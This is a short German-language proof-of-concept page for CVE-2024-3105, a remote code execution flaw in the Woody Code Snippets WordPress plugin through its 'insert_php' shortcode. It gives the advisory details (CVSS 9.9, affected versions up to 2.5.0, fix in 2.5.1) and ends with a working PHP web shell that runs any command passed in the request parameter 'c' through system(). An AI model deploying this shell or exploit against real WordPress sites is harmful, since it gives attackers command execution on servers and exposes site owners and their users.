
Ein PoC Exploit für CVE-2024-3105 - Das Woody code snippets – Insert Header Footer Code, AdSense Ads plugin für WordPress Remote Code Execution (RCE)
Das Woody Code Snippets – Insert Header Footer Code, AdSense Ads Plugin für WordPress ist in allen Versionen bis einschließlich 2.5.0 anfällig für Remote Code Execution über den Shortcode 'insert_php'. Dies liegt daran, dass das Plugin die Nutzung der Funktionalität nicht auf hochberechtigte autorisierte Benutzer beschränkt. Dadurch ist es authentifizierten Angreifern mit Contributor-Zugriff und höher möglich, Code auf dem Server auszuführen.
Basis-Score: 9.9 KRITISCH
Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Software-Typ: Plugin
Software-Slug: insert-php
Behebung: Update auf Version 2.5.1 oder eine neuere gepatchte Version
Betroffene Version: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>